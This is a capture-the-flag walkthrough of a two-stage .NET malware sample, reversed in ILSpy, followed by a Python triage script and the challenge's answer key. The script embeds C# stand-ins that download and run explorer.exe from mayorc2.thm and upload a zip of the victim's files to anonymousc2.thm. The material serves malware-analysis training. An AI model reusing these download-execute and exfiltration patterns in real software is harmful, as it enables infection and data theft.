Day 21
HELP ME...I'm REVERSE ENGINEERING!
Welcome to Day 21 of Advent of Cyber 2024 🎄
Today’s challenge dives into the fascinating world of reverse engineering using ILSpy.
Introduction to Reverse Engineering
Reverse engineering involves deconstructing software or binaries to understand their behavior. It’s a vital cybersecurity technique used to:
Identify malware functionality.
Detect security flaws in applications.
Attribute binaries to specific threat actors.
Let's begin:
We have an exe named WarevilleApp.exe
We need to decompile it and find the answers to the questions below.
Open the exe in ILSpy.
First we need to find the function that downloads and executes files in WarevilleApp.exe: expand the Form1 section and inspect it.
Here we can find the DownloadAndExecuteFile() function, which downloads explorer.exe from mayorc2.thm.
Let's run WarevilleApp.exe:
When we run it, a file named explorer.exe is downloaded; we need to decompile that one too to find the remaining answers.
Open explorer.exe in ILSpy:
Visit the Pictures folder to check the zip file:
We can see the zip file named CollectedFiles.zip.
Finally, to find the name of the C2 server, check the UploadFiletoServer function of explorer.exe:
We can see the server name: anonymousc2.thm
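The same four findings (download-and-execute method, download domain, zip name, upload server) can be pulled out of decompiled C# automatically. The script below is an added example, not part of the room or the challenge binaries; the two source strings are constructed stand-ins for ILSpy output that reuse the names from the walkthrough, and the method/API patterns are assumptions about how flat ILSpy output looks.

```python
import re

# Constructed stand-in for the stage 1 decompilation (not the real ILSpy output).
STAGE1_SRC = '''
public void DownloadAndExecuteFile()
{
    string url = "http://mayorc2.thm/explorer.exe";
    string path = Path.Combine(downloads, "explorer.exe");
    new WebClient().DownloadFile(url, path);
    Process.Start(path);
}
'''

# Constructed stand-in for the stage 2 decompilation.
STAGE2_SRC = '''
public void CollectFiles()
{
    ZipFile.CreateFromDirectory(pictures, "CollectedFiles.zip");
}
public void UploadFiletoServer(string zipPath)
{
    string server = "http://anonymousc2.thm/upload";
    new WebClient().UploadFile(server, zipPath);
}
'''

METHOD_RE = re.compile(r'(?:public|private|internal)\s+(?:static\s+)?[\w<>\[\]]+\s+(\w+)\s*\([^)]*\)')
URL_RE = re.compile(r'https?://([\w.-]+)')      # captures only the host part
ZIP_RE = re.compile(r'"([^"]+\.zip)"')          # quoted *.zip string literals
DOWNLOAD_APIS = ("DownloadFile", "DownloadData", "DownloadString")
EXEC_APIS = ("Process.Start",)
UPLOAD_APIS = ("UploadFile", "UploadData", "UploadString")

def split_methods(src):
    """Map method name -> body by slicing between method headers (flat ILSpy output)."""
    heads = list(METHOD_RE.finditer(src))
    return {m.group(1): src[m.end():(heads[i + 1].start() if i + 1 < len(heads) else len(src))]
            for i, m in enumerate(heads)}

def triage(src):
    """Flag download+execute and upload methods, and collect hosts and zip names."""
    report = {"download_and_execute": [], "uploaders": [], "domains": set(), "zip_files": set()}
    for name, body in split_methods(src).items():
        report["domains"].update(URL_RE.findall(body))
        report["zip_files"].update(ZIP_RE.findall(body))
        if any(a in body for a in DOWNLOAD_APIS) and any(a in body for a in EXEC_APIS):
            report["download_and_execute"].append(name)
        if any(a in body for a in UPLOAD_APIS):
            report["uploaders"].append(name)
    return report

if __name__ == "__main__":
    for label, src in (("stage1", STAGE1_SRC), ("stage2", STAGE2_SRC)):
        print(label, triage(src))
```

The regexes assume string literals survive decompilation; if the malware builds URLs at runtime, the hosts will only show up dynamically (or in the ILSpy view of the concatenation), not in this static pass.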
1. What is the function name that downloads and executes files in the WarevilleApp.exe?
A: DownloadAndExecuteFile
2. Once you execute the WarevilleApp.exe, it downloads another binary to the Downloads folder. What is the name of the binary?
A: explorer.exe
3. What domain name is the one from where the file is downloaded after running WarevilleApp.exe?
A: mayorc2.thm
4. The stage 2 binary is executed automatically and creates a zip file comprising the victim's computer data; what is the name of the zip file?
A: CollectedFiles.zip
5. What is the name of the C2 server where the stage 2 binary tries to upload files?
A: anonymousc2.thm
Stay tuned for Day 22 and Happy Hacking 🎄
Thank you!